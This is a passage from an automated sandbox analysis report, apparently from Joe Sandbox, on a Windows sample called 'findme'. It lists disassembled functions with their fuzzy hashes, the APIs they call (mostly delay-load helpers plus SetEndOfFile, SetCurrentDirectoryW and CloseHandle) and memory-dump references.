                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: f13790f063f02dc760baae51b2d94ed47997bd7bda08c67ac45704bd0b6ab507
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: f13790f063f02dc760baae51b2d94ed47997bd7bda08c67ac45704bd0b6ab507
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DD997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 6a38527ca7bee5c641de5a8c61d23e8d48c3b542ee1bdce1fc6c9e66c0eedce5
                    • Instruction ID: d4164b4ff19dfbdfb1e8fe8695f3d77c2066cec992a66051709352062259ec60
                    • Opcode Fuzzy Hash: 6a38527ca7bee5c641de5a8c61d23e8d48c3b542ee1bdce1fc6c9e66c0eedce5
                    • Instruction Fuzzy Hash: 44A012D196C0027C30093201EC26D36021CC4C2B14330440FB006901C094482805143E
                    Function 004DDACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 37e3b18b21ccdc0fe0595c4fe303f9f01c0fa39afc3b65a704a27a73984a5a5c
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: 37e3b18b21ccdc0fe0595c4fe303f9f01c0fa39afc3b65a704a27a73984a5a5c
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    Function 004DDAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 68259779fdcaec0d598d020439d7947baf584ba55c43a126a029b1cfb6e26def
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: 68259779fdcaec0d598d020439d7947baf584ba55c43a126a029b1cfb6e26def
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    Function 004DDAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 769fef2bf55169c4c5924916b502b017274e279b10035f7f40965c4331ec6099
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: 769fef2bf55169c4c5924916b502b017274e279b10035f7f40965c4331ec6099
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    Function 004DDAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 0ed66114d00284e5034b660d16bfce03b8b354bdc6284874c388559f4d5c61f3
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: 0ed66114d00284e5034b660d16bfce03b8b354bdc6284874c388559f4d5c61f3
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    Function 004DDAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: bec1696c4e0a7e3ba631b628862bca6392b6cc702ad79ed7afde4d0c8909e818
                    • Instruction ID: 63911c92570a1000fd5bb91756aaca505fb5f1c9123bfa1b69101230615beff1
                    • Opcode Fuzzy Hash: bec1696c4e0a7e3ba631b628862bca6392b6cc702ad79ed7afde4d0c8909e818
                    • Instruction Fuzzy Hash: 6CA001A6AAD107BC31187252ED2AE7A026CC4C5B657309A1FB50A94289A98C584A587E
                    Function 004DDAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDAB2
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 3b1f6173b4bc75f253cd01b8e809e34c53fa9e81ca6c7180c5dd57a19774f383
                    • Instruction ID: 7530a666a809beaf7a59d1e1586f1402b29a1fa6d5508af2f199146527d3c8a1
                    • Opcode Fuzzy Hash: 3b1f6173b4bc75f253cd01b8e809e34c53fa9e81ca6c7180c5dd57a19774f383
                    • Instruction Fuzzy Hash: F5A011A2AAC0023C3008B202EC2AE3A022CC0C0B22330820FB00AA0288A88C080A083E
                    Function 004DDBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: bda469f4dfb49036d978e708c1d3a3560a3afe67a32187cd752fd2c090821a9c
                    • Instruction ID: 570f39233ed7a99baa4b23c68198673bd71ea8b590e4a36cb5d51e37d488c03f
                    • Opcode Fuzzy Hash: bda469f4dfb49036d978e708c1d3a3560a3afe67a32187cd752fd2c090821a9c
                    • Instruction Fuzzy Hash: 44A0129966C006BC30081212AC2BD37022CC0C0B14330440FB1068014059481C09003D
                    Function 004DDC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: f2ffef9c72fe8c397ccb58e22397aefc41d9f24b295bbc352863a83fcc25ccd1
                    • Instruction ID: 2c109875889f58559786dce60af5962edaa1a0efbbc5b5edccd598a68d5ceff7
                    • Opcode Fuzzy Hash: f2ffef9c72fe8c397ccb58e22397aefc41d9f24b295bbc352863a83fcc25ccd1
                    • Instruction Fuzzy Hash: CEA0129597C1027C300C2241AC26D36022CC0C0F10730480FB1069014055881C09403D
                    Function 004DDC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDC36
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 4137c85bac73cf90b00955982a38bef77729d0903f5e52cc39364502190d456f
                    • Instruction ID: 2c109875889f58559786dce60af5962edaa1a0efbbc5b5edccd598a68d5ceff7
                    • Opcode Fuzzy Hash: 4137c85bac73cf90b00955982a38bef77729d0903f5e52cc39364502190d456f
                    • Instruction Fuzzy Hash: CEA0129597C1027C300C2241AC26D36022CC0C0F10730480FB1069014055881C09403D
                    Function 004DDC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: d13271c20b0fc6e3316a92850ef9d484fa0980166a10a2b83464e938236cf0d1
                    • Instruction ID: 570f39233ed7a99baa4b23c68198673bd71ea8b590e4a36cb5d51e37d488c03f
                    • Opcode Fuzzy Hash: d13271c20b0fc6e3316a92850ef9d484fa0980166a10a2b83464e938236cf0d1
                    • Instruction Fuzzy Hash: 44A0129966C006BC30081212AC2BD37022CC0C0B14330440FB1068014059481C09003D
                    Function 004DDC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 0186920e670f657d622bdf0f2a0ff30b3a9ff87355c58a9e3de5e40ab004eea5
                    • Instruction ID: 570f39233ed7a99baa4b23c68198673bd71ea8b590e4a36cb5d51e37d488c03f
                    • Opcode Fuzzy Hash: 0186920e670f657d622bdf0f2a0ff30b3a9ff87355c58a9e3de5e40ab004eea5
                    • Instruction Fuzzy Hash: 44A0129966C006BC30081212AC2BD37022CC0C0B14330440FB1068014059481C09003D
                    Function 004DDC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DDBD5
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 7cc0f52837797c14048d9939d05961776693b5d43ced1fbe9b8ad6fa9c9f351d
                    • Instruction ID: 570f39233ed7a99baa4b23c68198673bd71ea8b590e4a36cb5d51e37d488c03f
                    • Opcode Fuzzy Hash: 7cc0f52837797c14048d9939d05961776693b5d43ced1fbe9b8ad6fa9c9f351d
                    • Instruction Fuzzy Hash: 44A0129966C006BC30081212AC2BD37022CC0C0B14330440FB1068014059481C09003D
                    Function 004C9EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                    Download Yara Rule
                    APIs
                    • SetEndOfFile.KERNELBASE(?,004C9104,?,?,-00001964), ref: 004C9EC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File
                    • String ID:
                    • API String ID: 749574446-0
                    • Opcode ID: 754f8a07655b022a77a97fffcef4b85d4bcc3d086acd5cf4eb9dd092036e5894
                    • Instruction ID: 8ab5c80bce1c171da5b6ab5cbcd4294322a10daad7ba8c3d4c96611713acb63a
                    • Opcode Fuzzy Hash: 754f8a07655b022a77a97fffcef4b85d4bcc3d086acd5cf4eb9dd092036e5894
                    • Instruction Fuzzy Hash: C1B011300A000A8A8E002F30CC088283A20EA2230B30082B0A002CA0A8CF22C022AA08
                    Function 004DA322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetCurrentDirectoryW.KERNELBASE(?,004DA587,C:\Users\user\Desktop,00000000,0050946A,00000006), ref: 004DA326
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CurrentDirectory
                    • String ID:
                    • API String ID: 1611563598-0
                    • Opcode ID: aef0d1a9ad78c03a2a7cf9cddf09d69dc17ea74666a345e13e29d71f18b79653
                    • Instruction ID: 1413f64ff3d5477877655de73bfd20bafc1463aff4ceebaeb4a0c14aceb9bb63
                    • Opcode Fuzzy Hash: aef0d1a9ad78c03a2a7cf9cddf09d69dc17ea74666a345e13e29d71f18b79653
                    • Instruction Fuzzy Hash: 64A01230194006568A000F30CD09C2576505760703F0086307042C00A0CB318824E504
                    Function 004C96D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                    Download Yara Rule
                    APIs
                    • CloseHandle.KERNELBASE(000000FF,?,?,004C968F,?,?,?,?,004F1FA1,000000FF), ref: 004C96EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
